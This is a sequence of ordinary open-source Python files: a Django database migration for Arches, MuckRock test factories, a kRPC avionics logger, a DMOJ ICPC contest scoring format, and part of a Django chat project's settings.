("version", models.TextField(null=True, blank=True)),
("isresource", models.BooleanField()),
("isactive", models.BooleanField()),
("iconclass", models.TextField(null=True, blank=True)),
("mapfeaturecolor", models.TextField(blank=True, null=True)),
("maplinewidth", models.IntegerField(blank=True, null=True)),
("mappointsize", models.IntegerField(blank=True, null=True)),
("subtitle", models.TextField(null=True, blank=True)),
],
options={"db_table": "graphs", "managed": True,},
),
migrations.CreateModel(name="Graph", fields=[], options={"proxy": True,}, bases=("models.GraphModel",),),
migrations.CreateModel(
name="CardModel",
fields=[
("cardid", models.UUIDField(default=uuid.uuid1, serialize=False, primary_key=True)),
("name", models.TextField(null=True, blank=True)),
("description", models.TextField(null=True, blank=True)),
("instructions", models.TextField(null=True, blank=True)),
("helpenabled", models.BooleanField(default=False)),
("helptitle", models.TextField(null=True, blank=True)),
("helptext", models.TextField(null=True, blank=True)),
("active", models.BooleanField(default=True)),
("visible", models.BooleanField(default=True)),
("sortorder", models.IntegerField(blank=True, null=True, default=None)),
],
options={"db_table": "cards", "managed": True,},
),
migrations.CreateModel(name="Card", fields=[], options={"proxy": True,}, bases=("models.CardModel",),),
migrations.CreateModel(
name="CardXNodeXWidget",
fields=[
("card", models.ForeignKey(to="models.CardModel", db_column="cardid", on_delete=models.CASCADE)),
("id", models.UUIDField(default=uuid.uuid1, primary_key=True, serialize=False)),
("config", JSONField(blank=True, db_column="config", null=True)),
("label", models.TextField(blank=True, null=True)),
("sortorder", models.IntegerField(blank=True, null=True, default=None)),
],
options={"db_table": "cards_x_nodes_x_widgets", "managed": True,},
),
migrations.CreateModel(
name="Concept",
fields=[
("conceptid", models.UUIDField(default=uuid.uuid1, primary_key=True, serialize=False)),
("legacyoid", models.TextField(unique=True)),
],
options={"db_table": "concepts", "managed": True,},
),
migrations.CreateModel(
name="DDataType",
fields=[
("datatype", models.TextField(primary_key=True, serialize=False)),
("iconclass", models.TextField()),
("modulename", models.TextField(blank=True, null=True)),
("classname", models.TextField(blank=True, null=True)),
("configcomponent", models.TextField(blank=True, null=True)),
("defaultconfig", JSONField(blank=True, db_column="defaultconfig", null=True)),
("configname", models.TextField(blank=True, null=True)),
("isgeometric", models.BooleanField(default=False)),
],
options={"db_table": "d_data_types", "managed": True,},
),
migrations.CreateModel(
name="DLanguage",
fields=[
("languageid", models.TextField(primary_key=True, serialize=False)),
("languagename", models.TextField()),
("isdefault", models.BooleanField()),
],
options={"db_table": "d_languages", "managed": True,},
),
migrations.CreateModel(
name="DNodeType",
fields=[("nodetype", models.TextField(primary_key=True, serialize=False)), ("namespace", models.TextField()),],
options={"db_table": "d_node_types", "managed": True,},
),
migrations.CreateModel(
name="DRelationType",
fields=[
("relationtype", models.TextField(primary_key=True, serialize=False)),
("category", models.TextField()),
("namespace", models.TextField()),
],
options={"db_table": "d_relation_types", "managed": True,},
),
migrations.CreateModel(
name="DValueType",
fields=[
("valuetype", models.TextField(primary_key=True, serialize=False)),
("category", models.TextField(blank=True, null=True)),
("description", models.TextField(blank=True, null=True)),
("namespace", models.TextField()),
("datatype", models.TextField(blank=True, null=True)),
],
options={"db_table": "d_value_types", "managed": True,},
),
migrations.CreateModel(
name="Edge",
fields=[
("edgeid", models.UUIDField(default=uuid.uuid1, primary_key=True, serialize=False)),
("name", models.TextField(blank=True, null=True)),
("description", models.TextField(blank=True, null=True)),
("ontologyproperty", models.TextField(blank=True, null=True)),
(
"graph",
models.ForeignKey(blank=False, db_column="graphid", null=False, to="models.GraphModel", on_delete=models.CASCADE),
),
],
options={"db_table": "edges", "managed": True,},
),
migrations.CreateModel(
name="EditLog",
fields=[
("editlogid", models.UUIDField(default=uuid.uuid1, serialize=False, primary_key=True)),
("resourceclassid", models.TextField(null=True, blank=True)),
("resourceinstanceid", models.TextField(null=True, blank=True)),
("attributenodeid", models.TextField(null=True, blank=True)),
("tileinstanceid", models.TextField(null=True, blank=True)),
("edittype", models.TextField(null=True, blank=True)),
("newvalue", models.TextField(null=True, blank=True)),
("oldvalue", models.TextField(null=True, blank=True)),
("timestamp", models.DateTimeField(null=True, blank=True)),
("userid", models.TextField(null=True, blank=True)),
("user_firstname", models.TextField(null=True, blank=True)),
("user_lastname", models.TextField(null=True, blank=True)),
("user_email", models.TextField(null=True, blank=True)),
("note", models.TextField(null=True, blank=True)),
],
options={"db_table": "edit_log", "managed": True,},
),
migrations.CreateModel(
name="File",
fields=[
("fileid", models.UUIDField(default=uuid.uuid1, primary_key=True, serialize=False)),
("path", models.FileField(upload_to="uploadedfiles")),
],
options={"db_table": "files", "managed": True,},
),
migrations.CreateModel(
name="Form",
fields=[
("formid", models.UUIDField(default=uuid.uuid1, primary_key=True, serialize=False)),
("title", models.TextField(blank=True, null=True)),
("subtitle", models.TextField(blank=True, null=True)),
("iconclass", models.TextField(blank=True, null=True)),
("visible", models.BooleanField(default=True)),
("sortorder", models.IntegerField(blank=True, null=True, default=None)),
],
options={"db_table": "forms", "managed": True,},
),
migrations.CreateModel(
name="FormXCard",
fields=[
("id", models.UUIDField(default=uuid.uuid1, primary_key=True, serialize=False)),
("card", models.ForeignKey(to="models.CardModel", db_column="cardid", on_delete=models.CASCADE)),
("form", models.ForeignKey(to="models.Form", db_column="formid", on_delete=models.CASCADE)),
("sortorder", models.IntegerField(blank=True, null=True, default=None)),
],
options={"db_table": "forms_x_cards", "managed": True,},
),
migrations.CreateModel(
name="Function",
fields=[
("functionid", models.UUIDField(primary_key=True, default=uuid.uuid1, serialize=False)),
("functiontype", models.TextField(blank=True, null=True)),
("name", models.TextField(blank=True, null=True)),
("description", models.TextField(blank=True, null=True)),
("defaultconfig", JSONField(blank=True, null=True, db_column="defaultconfig")),
("modulename", models.TextField(blank=True, null=True)),
("classname", models.TextField(blank=True, null=True)),
("component", models.TextField(blank=True, null=True)),
],
options={"db_table": "functions", "managed": True,},
),
migrations.CreateModel(
name="FunctionXGraph",
fields=[
("id", models.UUIDField(primary_key=True, default=uuid.uuid1, serialize=False)),
("function", models.ForeignKey(to="models.Function", db_column="functionid", on_delete=models.CASCADE)),
("graph", models.ForeignKey(to="models.GraphModel", db_column="graphid", on_delete=models.CASCADE)),
("config", JSONField(blank=True, null=True, db_column="config")),
],
options={"db_table": "functions_x_graphs", "managed": True,},
),
migrations.CreateModel(
name="Icon",
fields=[
("id", models.AutoField(primary_key=True, serialize=True)),
("name", models.TextField(blank=True, null=True)),
("cssclass", models.TextField(blank=True, null=True)),
],
options={"db_table": "icons", "managed": True,},
),
migrations.CreateModel(
name="Node",
fields=[
("nodeid", models.UUIDField(default=uuid.uuid1, primary_key=True, serialize=False)),
("name", models.TextField()),
("description", models.TextField(blank=True, null=True)),
("istopnode", models.BooleanField()),
("ontologyclass", models.TextField(blank=True, null=True)),
("datatype", models.TextField()),
(
"graph",
models.ForeignKey(blank=False, db_column="graphid", null=False, to="models.GraphModel", on_delete=models.CASCADE),
),
("config", JSONField(blank=True, db_column="config", null=True)),
],
options={"db_table": "nodes", "managed": True,},
),
migrations.CreateModel(
name="NodeGroup",
fields=[
("nodegroupid", models.UUIDField(default=uuid.uuid1, primary_key=True, serialize=False)),
("legacygroupid", models.TextField(blank=True, null=True)),
("cardinality", models.TextField(blank=True, default="1")),
(
"parentnodegroup",
models.ForeignKey(
blank=True, db_column="parentnodegroupid", null=True, to="models.NodeGroup", on_delete=models.CASCADE
),
),
],
options={
"db_table": "node_groups",
"managed": True,
"default_permissions": (),
"permissions": (
("read_nodegroup", "Read"),
("write_nodegroup", "Create/Update"),
("delete_nodegroup", "Delete"),
("no_access_to_nodegroup", "No Access"),
),
},
),
migrations.CreateModel(
name="Ontology",
fields=[
("ontologyid", models.UUIDField(default=uuid.uuid1, primary_key=True)),
("name", models.TextField()),
("version", models.TextField()),
("path", models.TextField()),
(
"parentontology",
models.ForeignKey(
to="models.Ontology",
db_column="parentontologyid",
related_name="extensions",
null=True,
blank=True,
on_delete=models.CASCADE,
),
),
],
options={"db_table": "ontologies", "managed": True,},
),
migrations.CreateModel(
name="OntologyClass",
fields=[
("ontologyclassid", models.UUIDField(default=uuid.uuid1, primary_key=True)),
("source", models.TextField()),
("target", JSONField(null=True)),
(
"ontology",
models.ForeignKey(
to="models.Ontology", db_column="ontologyid", related_name="ontologyclasses", on_delete=models.CASCADE
),
),
],
options={"db_table": "ontologyclasses", "managed": True,},
),
migrations.CreateModel(
name="Relation",
fields=[
("relationid", models.UUIDField(default=uuid.uuid1, primary_key=True, serialize=False)),
(
"conceptfrom",
models.ForeignKey(
db_column="conceptidfrom", related_name="relation_concepts_from", to="models.Concept", on_delete=models.CASCADE
),
),
(
"conceptto",
models.ForeignKey(
db_column="conceptidto", related_name="relation_concepts_to", to="models.Concept", on_delete=models.CASCADE
),
),
("relationtype", models.ForeignKey(db_column="relationtype", to="models.DRelationType", on_delete=models.CASCADE)),
],
options={"db_table": "relations", "managed": True,},
),
migrations.CreateModel(
name="ReportTemplate",
fields=[
("templateid", models.UUIDField(default=uuid.uuid1, primary_key=True, serialize=False)),
("name", models.TextField(null=True, blank=True)),
("description", models.TextField(null=True, blank=True)),
("component", models.TextField()),
("componentname", models.TextField()),
("defaultconfig", JSONField(blank=True, db_column="defaultconfig", null=True)),
],
options={"db_table": "report_templates", "managed": True,},
),
migrations.CreateModel(
name="Report",
fields=[
("reportid", models.UUIDField(default=uuid.uuid1, primary_key=True, serialize=False)),
("name", models.TextField(null=True, blank=True)),
("template", models.ForeignKey(db_column="templateid", to="models.ReportTemplate", on_delete=models.CASCADE)),
("graph", models.ForeignKey(db_column="graphid", to="models.GraphModel", on_delete=models.CASCADE)),
("config", JSONField(blank=True, db_column="config", null=True)),
("formsconfig", JSONField(blank=True, db_column="formsconfig", null=True)),
("active", models.BooleanField(default=False)),
],
options={"db_table": "reports", "managed": True,},
),
migrations.CreateModel(
name="Resource2ResourceConstraint",
fields=[
("resource2resourceid", models.UUIDField(default=uuid.uuid1, primary_key=True, serialize=False)),
(
"resourceclassfrom",
models.ForeignKey(
blank=True,
db_column="resourceclassfrom",
null=True,
related_name="resxres_contstraint_classes_from",
to="models.Node",
on_delete=models.SET_NULL,
),
),
(
"resourceclassto",
models.ForeignKey(
blank=True,
db_column="resourceclassto",
null=True,
related_name="resxres_contstraint_classes_to",
to="models.Node",
on_delete=models.SET_NULL,
),
),
],
options={"db_table": "resource_2_resource_constraints", "managed": True,},
),
migrations.CreateModel(
name="ResourceInstance",
fields=[
("resourceinstanceid", models.UUIDField(default=uuid.uuid1, primary_key=True, serialize=False)),
("legacyid", models.TextField(blank=True, unique=True, null=True)),
("graph", models.ForeignKey(db_column="graphid", to="models.GraphModel", on_delete=models.CASCADE)),
("createdtime", models.DateTimeField(auto_now_add=True)),
],
options={"db_table": "resource_instances", "managed": True,},
),
migrations.CreateModel(
name="ResourceXResource",
fields=[
("resourcexid", models.UUIDField(default=uuid.uuid1, primary_key=True, serialize=False)),
("notes", models.TextField(blank=True, null=True)),
("datestarted", models.DateField(blank=True, null=True)),
("dateended", models.DateField(blank=True, null=True)),
],
options={"db_table": "resource_x_resource", "managed": True,},
),
migrations.CreateModel(
name="TileModel",
fields=[
("tileid", models.UUIDField(default=uuid.uuid1, primary_key=True, serialize=False)),
("data", JSONField(blank=True, db_column="tiledata", null=True)),
("nodegroup", models.ForeignKey(db_column="nodegroupid", to="models.NodeGroup", on_delete=models.CASCADE)),
(
"parenttile",
models.ForeignKey(blank=True, db_column="parenttileid", null=True, to="models.TileModel", on_delete=models.CASCADE),
),
(
"resourceinstance",
models.ForeignKey(db_column="resourceinstanceid", to="models.ResourceInstance", on_delete=models.CASCADE),
),
("sortorder", models.IntegerField(blank=True, null=True, default=0)),
],
options={"db_table": "tiles", "managed": True,},
),
migrations.CreateModel(
name="Value",
fields=[
("valueid", models.UUIDField(default=uuid.uuid1, primary_key=True, serialize=False)),
("value", models.TextField()),
("concept", models.ForeignKey(db_column="conceptid", to="models.Concept", on_delete=models.CASCADE)),
(
"language",
models.ForeignKey(blank=True, db_column="languageid", null=True, to="models.DLanguage", on_delete=models.CASCADE),
),
("valuetype", models.ForeignKey(db_column="valuetype", to="models.DValueType", on_delete=models.CASCADE)),
],
options={"db_table": "values", "managed": True,},
),
migrations.CreateModel(
name="Widget",
fields=[
("widgetid", models.UUIDField(default=uuid.uuid1, primary_key=True, serialize=False)),
("name", models.TextField()),
("component", models.TextField()),
("defaultconfig", JSONField(blank=True, db_column="defaultconfig", null=True)),
("helptext", models.TextField(blank=True, null=True)),
("datatype", models.TextField()),
],
options={"db_table": "widgets", "managed": True,},
),
migrations.CreateModel(
name="MapLayer",
fields=[
("maplayerid", models.UUIDField(default=uuid.uuid1, primary_key=True, serialize=False)),
("name", models.TextField(unique=True)),
("layerdefinitions", JSONField(blank=True, db_column="layerdefinitions", null=True)),
("isoverlay", models.BooleanField(default=False)),
("icon", models.TextField(default=None)),
("activated", models.BooleanField(default=True)),
("addtomap", models.BooleanField(default=False)),
],
options={"db_table": "map_layers", "managed": True,},
),
migrations.CreateModel(
name="MapSource",
fields=[
("id", models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name="ID")),
("name", models.TextField(unique=True)),
("source", JSONField(blank=True, db_column="source", null=True)),
],
options={"db_table": "map_sources", "managed": True,},
),
migrations.CreateModel(
name="TileserverLayer",
fields=[
("name", models.TextField(unique=True)),
("path", models.TextField()),
("config", JSONField(db_column="config")),
("map_layer", models.ForeignKey(db_column="map_layerid", to="models.MapLayer", on_delete=models.CASCADE)),
("map_source", models.ForeignKey(db_column="map_sourceid", to="models.MapSource", on_delete=models.CASCADE)),
],
options={"db_table": "tileserver_layers", "managed": True,},
),
migrations.CreateModel(
name="GraphXMapping",
fields=[
("id", models.UUIDField(primary_key=True, default=uuid.uuid1, serialize=False)),
("graph", models.ForeignKey(to="models.GraphModel", db_column="graphid", on_delete=models.CASCADE)),
("mapping", JSONField(blank=True, db_column="mapping")),
],
options={"db_table": "graphs_x_mapping_file", "managed": True,},
),
migrations.AddField(
model_name="ddatatype",
name="defaultwidget",
field=models.ForeignKey(db_column="defaultwidget", to="models.Widget", null=True, on_delete=models.SET_NULL),
),
migrations.AddField(
model_name="resourcexresource",
name="relationshiptype",
field=models.ForeignKey(db_column="relationshiptype", to="models.Value", on_delete=models.CASCADE),
),
migrations.AddField(
model_name="resourcexresource",
name="resourceinstanceidfrom",
field=models.ForeignKey(
blank=True,
db_column="resourceinstanceidfrom",
null=True,
related_name="resxres_resource_instance_ids_from",
to="models.ResourceInstance",
on_delete=models.CASCADE,
),
),
migrations.AddField(
model_name="resourcexresource",
name="resourceinstanceidto",
field=models.ForeignKey(
blank=True,
db_column="resourceinstanceidto",
null=True,
related_name="resxres_resource_instance_ids_to",
to="models.ResourceInstance",
on_delete=models.CASCADE,
),
),
migrations.AddField(
model_name="node",
name="nodegroup",
field=models.ForeignKey(blank=True, db_column="nodegroupid", null=True, to="models.NodeGroup", on_delete=models.CASCADE),
),
migrations.AddField(
model_name="edge",
name="domainnode",
field=models.ForeignKey(db_column="domainnodeid", related_name="edge_domains", to="models.Node", on_delete=models.CASCADE),
),
migrations.AddField(
model_name="edge",
name="rangenode",
field=models.ForeignKey(db_column="rangenodeid", related_name="edge_ranges", to="models.Node", on_delete=models.CASCADE),
),
migrations.AddField(
model_name="concept",
name="nodetype",
field=models.ForeignKey(db_column="nodetype", to="models.DNodeType", on_delete=models.CASCADE),
),
migrations.AddField(
model_name="cardxnodexwidget",
name="node",
field=models.ForeignKey(db_column="nodeid", to="models.Node", on_delete=models.CASCADE),
),
migrations.AddField(
model_name="cardxnodexwidget",
name="widget",
field=models.ForeignKey(db_column="widgetid", to="models.Widget", on_delete=models.CASCADE),
),
migrations.AddField(
model_name="cardmodel",
name="nodegroup",
field=models.ForeignKey(db_column="nodegroupid", to="models.NodeGroup", on_delete=models.CASCADE),
),
migrations.AddField(
model_name="cardmodel",
name="graph",
field=models.ForeignKey(db_column="graphid", to="models.GraphModel", on_delete=models.CASCADE),
),
migrations.AddField(
model_name="form",
name="graph",
field=models.ForeignKey(
to="models.GraphModel", db_column="graphid", related_name="forms", null=False, blank=False, on_delete=models.CASCADE
),
),
migrations.AddField(
model_name="graphmodel", name="functions", field=models.ManyToManyField(to="models.Function", through="FunctionXGraph"),
),
migrations.AddField(
model_name="graphmodel",
name="ontology",
field=models.ForeignKey(
to="models.Ontology", db_column="ontologyid", related_name="graphs", null=True, blank=True, on_delete=models.SET_NULL
),
),
migrations.AlterUniqueTogether(name="edge", unique_together={("rangenode", "domainnode")},),
migrations.AlterUniqueTogether(name="cardxnodexwidget", unique_together={("node", "card", "widget")},),
migrations.AlterUniqueTogether(name="ontologyclass", unique_together={("source", "ontology")},),
migrations.AlterUniqueTogether(name="relation", unique_together={("conceptfrom", "conceptto", "relationtype")},),
migrations.AlterUniqueTogether(name="functionxgraph", unique_together={("function", "graph")},),
CreateAutoPopulateUUIDField("graphs", ["graphid"]),
CreateAutoPopulateUUIDField("cards", ["cardid"]),
CreateAutoPopulateUUIDField("concepts", ["conceptid"]),
CreateAutoPopulateUUIDField("edges", ["edgeid"]),
CreateAutoPopulateUUIDField("edit_log", ["editlogid"]),
CreateAutoPopulateUUIDField("forms", ["formid"]),
CreateAutoPopulateUUIDField("node_groups", ["nodegroupid"]),
CreateAutoPopulateUUIDField("nodes", ["nodeid"]),
CreateAutoPopulateUUIDField("relations", ["relationid"]),
CreateAutoPopulateUUIDField("resource_2_resource_constraints", ["resource2resourceid"]),
CreateAutoPopulateUUIDField("resource_instances", ["resourceinstanceid"]),
CreateAutoPopulateUUIDField("tiles", ["tileid"]),
CreateAutoPopulateUUIDField("values", ["valueid"]),
CreateAutoPopulateUUIDField("widgets", ["widgetid"]),
migrations.RunSQL(
"""
ALTER TABLE nodes ADD CONSTRAINT nodes_ddatatypes_fk FOREIGN KEY (datatype)
REFERENCES public.d_data_types (datatype) MATCH SIMPLE
"""
),
migrations.RunSQL(get_sql_string_from_file(os.path.join(settings.ROOT_DIR, "db", "dml", "db_data.sql")), ""),
migrations.RunPython(forwards_func, reverse_func),
migrations.RunPython(make_permissions, reverse_code=lambda *args, **kwargs: True),
]
|
archesproject/arches
|
arches/app/models/migrations/0001_initial.py
|
Python
|
agpl-3.0
| 36,390
|
"""
Testing factories for the communication app
"""
# Django
from django.utils import timezone
# Standard Library
from datetime import timedelta
# Third Party
import factory
import faker.providers.phone_number.en_US as faker_phone
# MuckRock
from muckrock.communication.models import (
Address,
EmailAddress,
EmailCommunication,
FaxCommunication,
PhoneNumber,
)
# Monkey patch the faker phone number provider to not produce international numbers
faker_phone.Provider.formats = [
f for f in faker_phone.Provider.formats if not f.startswith("+")
]
class EmailAddressFactory(factory.django.DjangoModelFactory):
"""A factory for creating email addresses"""
class Meta:
model = EmailAddress
email = factory.Faker("email")
name = factory.Faker("name")
class PhoneNumberFactory(factory.django.DjangoModelFactory):
"""A factory for creating phone numbers"""
class Meta:
model = PhoneNumber
number = factory.Sequence(lambda n: "617-555-%04d" % n)
class AddressFactory(factory.django.DjangoModelFactory):
"""A factory for creating addresses"""
class Meta:
model = Address
address = factory.Faker("address")
class EmailCommunicationFactory(factory.django.DjangoModelFactory):
"""A factory for creating email communications"""
class Meta:
model = EmailCommunication
communication = factory.SubFactory(
"muckrock.foia.factories.FOIACommunicationFactory"
)
sent_datetime = timezone.now() - timedelta(3)
from_email = factory.SubFactory(EmailAddressFactory)
raw_email = factory.RelatedFactory(
"muckrock.foia.factories.RawEmailFactory", "email"
)
class FaxCommunicationFactory(factory.django.DjangoModelFactory):
"""A factory for creating fax communications"""
class Meta:
model = FaxCommunication
communication = factory.SubFactory(
"muckrock.foia.factories.FOIACommunicationFactory"
)
sent_datetime = timezone.now() - timedelta(3)
to_number = factory.SubFactory(PhoneNumberFactory)
|
MuckRock/muckrock
|
muckrock/communication/factories.py
|
Python
|
agpl-3.0
| 2,077
|
import io
import logging
import sys
import time
import traceback
from tkinter import Listbox, LEFT, BOTH, Label, \
StringVar, NW, BooleanVar, DISABLED, NORMAL, X, NE
import krpc
from ttk import Checkbutton, Entry
from krcc_module import KRCCModule
# DECLARE_KRCC_MODULE
def load(root):
return AvionicsLogger(root)
class AvionicsLogger(KRCCModule):
def __init__(self, root):
super().__init__()
self.root = root
self.exception = None
self.list_string = StringVar()
self.listbox = Listbox(root, listvariable=self.list_string,
font='TkFixedFont', width=30)
self.write_cache = ''
self.logfile = None
self.enable_logging = BooleanVar()
self.enable_logging_checkbox = Checkbutton(
root, var=self.enable_logging, text='Enable logging',
command=self.enable_logging_changed)
self.logfile_label = Label(root, text='Logfile name:')
self.logfile_name = StringVar()
self.logfile_name_entry = Entry(root, textvar=self.logfile_name)
self.load()
def write(self, string):
if self.enable_logging.get() and self.logfile is None:
if self.logfile_name.get() == '':
self.logfile_name.set('logs/{}.log'.format(time.time()))
self.logfile = io.open(self.logfile_name.get(), 'a')
self.logfile.write(self.write_cache)
self.write_cache = ''
self.logfile.write(string)
def cache(self, string):
self.write_cache += string
def enable_logging_changed(self):
if not self.enable_logging.get():
self.logfile_name_entry.configure(state=NORMAL)
if self.logfile is not None:
self.logfile.close()
self.logfile = None
self.logfile_name.set('')
else:
self.logfile_name_entry.configure(state=DISABLED)
def establish_connection_and_run(self):
error = None
dots = 0
connection = None
while not self.terminate:
try:
if connection is None:
connection = krpc.connect(name=self.name)
self.run_with_connection(connection)
error = None
dots = 0
except Exception as e:
if error != e.args[0]:
error = e.args[0]
print('\n')
print(traceback.format_exc())
sys.stdout.write('Retrying')
if dots > 80:
dots = 0
sys.stdout.write('\n')
sys.stdout.write('.')
dots += 1
sys.stdout.flush()
time.sleep(1)
if connection is not None:
connection.close()
def run_with_connection(self, connection):
logging.debug('KRPC connection established')
vessel = connection.space_center.active_vessel
ref = vessel.orbit.body.reference_frame
flight = connection.add_stream(vessel.flight, ref)
floats = [
'mean_altitude',
'atmosphere_density',
'ballistic_coefficient',
'drag_coefficient',
]
vectors = [
'velocity',
]
colon_pos_float = max([len(v) for v in floats])
colon_pos_vec = max([len(v) + 3 for v in vectors])
self.listbox.configure(width=max(colon_pos_float, colon_pos_vec) + 11)
# Write the log file header.
self.cache('time\t' + '\t'.join(floats) + '\t')
s = '{}\t' + '\t'.join('{{}}[{}]'.format(x) for x in [0, 1, 2])
self.cache('\t'.join(s.format(*(v for _ in [0, 1, 2, 3])) for v in vectors))
self.cache('\n')
log_sample_interval = 0.01
next_log_sample = time.time()
while not self.terminate:
values = [time.time()]
strings = []
for name in floats:
value = flight().__getattribute__(name)
values.append(value)
padding = colon_pos_float - len(name) + 9
format_string = '{{}}: {{:>{}.3f}}'.format(padding)
strings.append(format_string.format(name, value))
for name in vectors:
value = flight().__getattribute__(name)
magnitude = value[0]
padding = colon_pos_float - len(name) + 9
format_string = '{{}}: {{:>{}.3f}}'.format(padding)
strings.append(format_string.format(name, magnitude))
values.append(magnitude)
padding = colon_pos_vec - len(name) + 2
format_string = '{{}}[{{}}]: {{:>{}.3f}}'.format(padding)
for i in [0, 1, 2]:
values.append(value[i])
strings.append(format_string.format(name, i, value[i]))
if self.enable_logging.get() and time.time() > next_log_sample:
self.write('\t'.join(['{}'.format(v) for v in values]) + '\n')
next_log_sample = time.time() + log_sample_interval
self.list_string.set(tuple(strings))
def run(self):
try:
self.establish_connection_and_run()
self.logfile_name_entry.destroy()
self.logfile_label.destroy()
self.enable_logging_checkbox.destroy()
self.listbox.destroy()
except RuntimeError:
# Should only happen when KeyboardInterrupt is thrown in the MainThread.
pass
if self.logfile is not None:
self.logfile.close()
@property
def name(self):
return 'Avionics Logger'
def load(self):
self.listbox.pack(side=LEFT, fill=BOTH)
self.logfile_label.pack(side=LEFT, anchor=NW)
self.logfile_name_entry.pack(side=LEFT, anchor=NE, fill=X, expand=True)
self.enable_logging_checkbox.pack(side=LEFT, anchor=NW)
|
jsartisohn/krpc_scripts
|
avionics.py
|
Python
|
agpl-3.0
| 5,250
|
from datetime import timedelta
from django.core.exceptions import ValidationError
from django.db import connection
from django.template.defaultfilters import floatformat
from django.urls import reverse
from django.utils.html import format_html
from django.utils.safestring import mark_safe
from django.utils.translation import gettext_lazy
from judge.contest_format.default import DefaultContestFormat
from judge.contest_format.registry import register_contest_format
from judge.timezone import from_database_time
from judge.utils.timedelta import nice_repr
@register_contest_format('icpc')
class ICPCContestFormat(DefaultContestFormat):
name = gettext_lazy('ICPC')
config_defaults = {'penalty': 20}
config_validators = {'penalty': lambda x: x >= 0}
'''
penalty: Number of penalty minutes each incorrect submission adds. Defaults to 20.
'''
@classmethod
def validate(cls, config):
if config is None:
return
if not isinstance(config, dict):
raise ValidationError('ICPC-styled contest expects no config or dict as config')
for key, value in config.items():
if key not in cls.config_defaults:
raise ValidationError('unknown config key "%s"' % key)
if not isinstance(value, type(cls.config_defaults[key])):
raise ValidationError('invalid type for config key "%s"' % key)
if not cls.config_validators[key](value):
raise ValidationError('invalid value "%s" for config key "%s"' % (value, key))
def __init__(self, contest, config):
self.config = self.config_defaults.copy()
self.config.update(config or {})
self.contest = contest
def update_participation(self, participation):
cumtime = 0
last = 0
penalty = 0
score = 0
format_data = {}
with connection.cursor() as cursor:
cursor.execute('''
SELECT MAX(cs.points) as `points`, (
SELECT MIN(csub.date)
FROM judge_contestsubmission ccs LEFT OUTER JOIN
judge_submission csub ON (csub.id = ccs.submission_id)
WHERE ccs.problem_id = cp.id AND ccs.participation_id = %s AND ccs.points = MAX(cs.points)
) AS `time`, cp.id AS `prob`
FROM judge_contestproblem cp INNER JOIN
judge_contestsubmission cs ON (cs.problem_id = cp.id AND cs.participation_id = %s) LEFT OUTER JOIN
judge_submission sub ON (sub.id = cs.submission_id)
GROUP BY cp.id
''', (participation.id, participation.id))
for points, time, prob in cursor.fetchall():
time = from_database_time(time)
dt = (time - participation.start).total_seconds()
# Compute penalty
if self.config['penalty']:
# An IE can have a submission result of `None`
subs = participation.submissions.exclude(submission__result__isnull=True) \
.exclude(submission__result__in=['IE', 'CE']) \
.filter(problem_id=prob)
if points:
prev = subs.filter(submission__date__lte=time).count() - 1
penalty += prev * self.config['penalty'] * 60
else:
# We should always display the penalty, even if the user has a score of 0
prev = subs.count()
else:
prev = 0
if points:
cumtime += dt
last = max(last, dt)
format_data[str(prob)] = {'time': dt, 'points': points, 'penalty': prev}
score += points
participation.cumtime = cumtime + penalty
participation.score = round(score, self.contest.points_precision)
participation.tiebreaker = last # field is sorted from least to greatest
participation.format_data = format_data
participation.save()
def display_user_problem(self, participation, contest_problem):
format_data = (participation.format_data or {}).get(str(contest_problem.id))
if format_data:
penalty = format_html('<small style="color:red"> ({penalty})</small>',
penalty=floatformat(format_data['penalty'])) if format_data['penalty'] else ''
return format_html(
'<td class="{state}"><a href="{url}">{points}{penalty}<div class="solving-time">{time}</div></a></td>',
state=(('pretest-' if self.contest.run_pretests_only and contest_problem.is_pretested else '') +
self.best_solution_state(format_data['points'], contest_problem.points)),
url=reverse('contest_user_submissions',
args=[self.contest.key, participation.user.user.username, contest_problem.problem.code]),
points=floatformat(format_data['points']),
penalty=penalty,
time=nice_repr(timedelta(seconds=format_data['time']), 'noday'),
)
else:
return mark_safe('<td></td>')
def get_label_for_problem(self, index):
index += 1
ret = ''
while index > 0:
ret += chr((index - 1) % 26 + 65)
index = (index - 1) // 26
return ret[::-1]
|
DMOJ/site
|
judge/contest_format/icpc.py
|
Python
|
agpl-3.0
| 5,572
|
"""
Django settings for chat project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
from django.conf import global_settings
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '-ppj_f9b+@amiqrleaea&dh&ho=kp#uxi#w77t!boiix1dp$@a'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'allauth',
'allauth.account',
'allauth.socialaccount',
'rest_framework',
'swampdragon',
'swampdragon_auth',
'swampdragon_notifications',
'chatroom',
'django_extensions',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
TEMPLATE_CONTEXT_PROCESSORS = global_settings.TEMPLATE_CONTEXT_PROCESSORS + (
'django.core.context_processors.request',
'allauth.account.context_processors.account',
'allauth.socialaccount.context_processors.socialaccount',
)
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
'allauth.account.auth_backends.AuthenticationBackend',
)
SITE_ID = 1
ROOT_URLCONF = 'chat.urls'
WSGI_APPLICATION = 'chat.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'postgres',
'USER': 'postgres',
'HOST': 'db',
'PORT': 5432,
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
